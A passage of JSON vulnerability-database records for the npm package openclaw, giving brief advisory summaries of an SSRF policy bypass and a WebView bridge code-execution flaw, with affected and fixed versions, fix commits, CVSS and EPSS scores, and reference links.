                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-41911",
                "GHSA-5fc7-f62m-8983"
            ],
            "risk_score": 3.0,
            "exploitability": "0.5",
            "weighted_severity": "5.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mv8b-cryt-u3g8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89740?format=api",
            "vulnerability_id": "VCID-mxu5-yjqs-nuap",
            "summary": "OpenClaw: Existing-session browser interaction routes bypassed SSRF policy enforcement\n## Summary\n\nExisting-session browser interaction routes bypassed SSRF policy enforcement.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nExisting-session browser interaction routes could continue interacting with or navigating targets without applying the same SSRF navigation guard used by guarded browser routes.\n\n## Technical Details\n\nThe fix guards existing-session navigation and interaction routes with browser navigation policy checks.\n\n## Fix\n\nThe issue was fixed in #64370. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `daeb74920d5ad986cb600625180037e23221e93a`\n- PR: #64370\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43573",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00031",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09559",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11153",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11187",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43573"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/daeb74920d5ad986cb600625180037e23221e93a",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/daeb74920d5ad986cb600625180037e23221e93a"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/64370",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/64370"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-527m-976r-jf79",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-527m-976r-jf79"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43573",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43573"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-existing-session-browser-interaction-routes",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-existing-session-browser-interaction-routes"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-527m-976r-jf79",
                    "reference_id": "GHSA-527m-976r-jf79",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-527m-976r-jf79"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "CVE-2026-43573",
                "GHSA-527m-976r-jf79"
            ],
            "risk_score": 3.5,
            "exploitability": "0.5",
            "weighted_severity": "6.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mxu5-yjqs-nuap"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91810?format=api",
            "vulnerability_id": "VCID-nf6w-v1pc-mbe5",
            "summary": "OpenClaw: Arbitrary code execution via unvalidated WebView JavascriptInterface\n## Summary\nAndroid Canvas WebView pages from untrusted origins could invoke the JavascriptInterface bridge and inject instructions into the app.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `8b02ef133275be96d8aac2283100016c8a7f32e5`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- apps/android/app/src/main/java/ai/openclaw/app/ui/CanvasScreen.kt now snapshots page origin and rejects untrusted bridge calls.\n- apps/android/app/src/main/java/ai/openclaw/app/node/CanvasActionTrust.kt centralizes trusted origin and path validation for the bridge.\n\nOpenClaw thanks @cyjhhh for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35643",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00046",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14446",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00046",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14485",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00046",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14482",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35643"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/8b02ef133275be96d8aac2283100016c8a7f32e5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/8b02ef133275be96d8aac2283100016c8a7f32e5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cxmw-p77q-wchg",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cxmw-p77q-wchg"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35643",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35643"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-unvalidated-webview-javascriptinterface",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-unvalidated-webview-javascriptinterface"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cxmw-p77q-wchg",
                    "reference_id": "GHSA-cxmw-p77q-wchg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cxmw-p77q-wchg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
